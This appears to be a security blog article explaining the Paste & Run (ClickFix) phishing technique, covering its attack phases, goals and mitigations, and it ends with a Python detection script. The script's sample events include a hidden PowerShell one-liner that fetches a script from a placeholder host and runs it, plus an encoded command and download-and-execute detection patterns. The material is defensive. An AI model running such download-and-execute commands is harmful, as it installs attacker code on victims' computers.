Paste & Run: Executing malicious commands on corporate computers

The Paste & Run technique combines social engineering and malware to infect professionals’ computers and gain access to the information they store

Throughout 2025, a malicious technique has emerged that is causing companies major headaches: Paste & Run, also popularly known as the ClickFix technique.

Such is its significance that in March, Paste & Run was added to the MITRE ATT&CK catalog of techniques used by malicious actors, a global benchmark for the techniques, tactics, and procedures (TTPs) used by cyber attackers.

Below, we explain what the Paste & Run technique consists of, the objectives of the malicious actors who use it, and what companies and professionals can do to protect corporate computers and prevent serious damage.

1. The Paste & Run technique allows criminals to infect their victims’ computers with malware

The best way to understand how the Paste & Run technique works is to break down its phases:

  1. Malicious actors conduct research on their victims. To what end? To make the deception credible. In this malicious intelligence work, hostile actors are aided by AI and the wealth of information available online about a company and its professionals.
  2. A phishing campaign is created, again with the help of AI, to impersonate a company, polish the email’s visual appearance, and refine its content.
  3. The email’s content usually revolves around real business issues. For example, it may refer to rates, operating instructions, or the need to update a program to get the victim to click an HTML file attached to the email.
  4. When the victim does so, a pop-up window simulates a Microsoft Word message stating that the document cannot be opened due to a problem. To solve this, the victim must click a button (which copies a command without the victim being aware of it) and follow the instructions, which are usually to press Win+R to open the Windows console, press Ctrl+V to paste the command, and press Enter to execute it.
  5. This executes a malicious PowerShell command that allows a remote access trojan (RAT) to be downloaded and executed from a remote command-and-control server, without the user being able to detect suspicious activity on their computer.
  6. Thanks to this RAT, criminals can persist on the attacked computers and infect their victims’ devices with an infostealer capable of collecting access credentials to business software, session cookies, information stored in documents, etc. Cybersecurity experts have detected the use of sadly popular infostealers such as Lumma Stealer or Vidar linked to the Paste & Run technique.

2. The use of Paste & Run has been on the rise over the last year

Since the beginning of 2025, several attack campaigns have been detected that have used the Paste & Run technique to infect computers, such as the one carried out by Mocha Manakin. Thanks to a backdoor, cybercriminals have been able to implement advanced persistence mechanisms and maintain a long-term connection between the attacked device and the malicious command-and-control server.

Another notable case is that of Havoc, a command-and-control framework that allows attackers to take control of infected devices and has spread via the Paste & Run technique to target Microsoft SharePoint accounts, a key solution used by hundreds of thousands of companies.

3. Why Paste & Run can be successful: The victims’ lack of knowledge is key

Paste & Run is part of a family of techniques in which the user themselves infects their device by executing a malicious link, document, image, or command, as in this case.

While most professionals are aware that they should not click on suspicious websites or download programs, documents, or images from unverified sources, there is widespread ignorance about the dangers of command execution.

In fact, most company employees have basic computer skills and are unaware of what they are doing when they execute commands issued by hostile actors.

It is also important to note that the Paste & Run technique allows attackers to bypass the security controls of email managers and browsers that block or warn about potentially harmful files, preventing them from being downloaded.

4. Espionage, access to critical software, data theft… What are the objectives of attackers who use Paste & Run?

It is important to understand that the Paste & Run technique is only a vehicle for malicious actors to achieve their objectives. By installing infostealers and ensuring maximum persistence on the attacked computers, criminals can collect:

  • Information about professionals’ and companies’ online accounts and payment methods, if the computer user has access to this data.
  • Credentials to access corporate applications such as e-commerce, billing programs, logistics software, etc.
  • Session cookies that allow them to bypass an increasingly common security mechanism: two-factor authentication.
  • The history of the web browsers used by the user.

In addition, some infostealers are capable of:

  • Taking screenshots of infected computers, which can be extremely helpful in obtaining sensitive data.
  • Obtaining documents and other types of files found on a successfully attacked computer.

As a result, the Paste & Run technique can be extremely helpful to malicious actors who want to spy on companies or executives. For what purpose?

  • To commit financial fraud.
  • To steal business secrets and industrial property.
  • To trade in economic, commercial, or customer data.
  • To use stolen personal data to carry out scams against customers, employees, or suppliers.
  • To carry out covert actions in corporate programs with the aim of sabotaging the company’s operations. For example, altering its billing, modifying order management, or subverting sales.

5. How to combat attacks that use the Paste & Run technique

MITRE ATT&CK recommends three ways to mitigate the use of the Paste & Run technique against professionals and companies:

  1. Prevent the execution of malicious PowerShell commands, for example, by restricting access to dangerous language elements that can be used to “execute arbitrary Windows APIs or files.”
  2. Prevent network intrusions by analyzing and removing malicious downloads and blocking the activity of hostile actors.
  3. Restrict web-based content so that unknown files that should not be downloaded, as well as files from suspicious sites, can be blocked.

Beyond these recommendations that can be implemented by professionals in charge of corporate cybersecurity, it is also important to have cybersecurity services that prevent the Paste & Run technique from succeeding or detect the presence of malicious activity on corporate computers:

  • Social engineering test. For the Paste & Run technique to work, victims must decide to copy and execute the malicious commands. Therefore, the best way to prevent attacks based on this technique is to train professionals on how this technique works and how they should respond. Social engineering tests consist of simulated campaigns that allow companies to assess their staff’s resilience to this type of attack and to train professionals in a practical way.
  • Security audits and continuous monitoring of the technological infrastructure. The use of automated tools to perform security tests and detect suspicious traffic and activity within the corporate infrastructure is essential to business security. No less vital is the intervention of cybersecurity experts who can analyze data generated by automated solutions to rule out false positives and uncover more sophisticated malicious activity that can circumvent the tools’ detection mechanisms.
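
The monitoring described above can start with a rule for steps 4 and 5 of the attack chain: a shell started from the Run dialog (and therefore a child of explorer.exe) whose command line shows download-and-execute traits. The following Python is an added example, not code from this article; the event field names, indicator list, weights and threshold are assumptions, and the sample events are constructed.

```python
import re

# Shells a pasted Run-dialog command typically starts (assumed list, extend as needed).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Heuristic indicators with weights; assumptions for illustration, tune per environment.
INDICATORS = [
    ("hidden_window", 2, re.compile(r"\s-w(in\w*)?\s+hidden\b", re.I)),
    ("encoded_command", 2, re.compile(r"\s-e(nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download", 2, re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)),
    ("in_memory_exec", 2, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote_url", 1, re.compile(r"https?://", re.I)),
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return (score, indicator names) for one process-creation event."""
    # A command pasted into the Run dialog is spawned by explorer.exe, so other
    # parents (management agents, services) are out of scope for this rule.
    if basename(event["parent_image"]) != "explorer.exe" or basename(event["image"]) not in INTERPRETERS:
        return 0, []
    hits = [(n, w) for n, w, rx in INDICATORS if rx.search(event["command_line"])]
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(events, threshold=4):
    """Return one alert per event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score, "indicators": hits})
    return alerts

EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent_image": EXPLORER, "image": PS,
     "command_line": 'powershell -w hidden -c "iex (iwr https://cdn.example.invalid/fix.txt)"'},
    {"host": "WS-022", "parent_image": EXPLORER, "image": PS,
     "command_line": "powershell -WindowStyle Hidden -enc VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA="},
    {"host": "WS-031", "parent_image": EXPLORER, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c ipconfig /all"},
    {"host": "SRV-02", "parent_image": r"C:\Program Files\Mgmt\agent.exe", "image": PS,
     "command_line": 'powershell -c "iwr https://intranet.example.invalid/pkg.zip -OutFile pkg.zip"'},
]
if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```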

6. Conclusions

In short, the Paste & Run technique shows, once again, that malicious actors are constantly innovating to develop techniques, tactics, and procedures that allow them to achieve their objectives.

Therefore, companies cannot ignore the fact that the threat landscape is becoming increasingly complex and dangerous.

Investing in cybersecurity and raising awareness across all organizations is not an option but a strategic measure to safeguard a company’s critical assets and operations.

An action as seemingly trivial as ignoring a pop-up window can lead to financial losses, reputational damage, and legal problems for an organization.

That is why preventing the use of the Paste & Run technique against a company’s professionals, or detecting an ongoing attack early, is essential.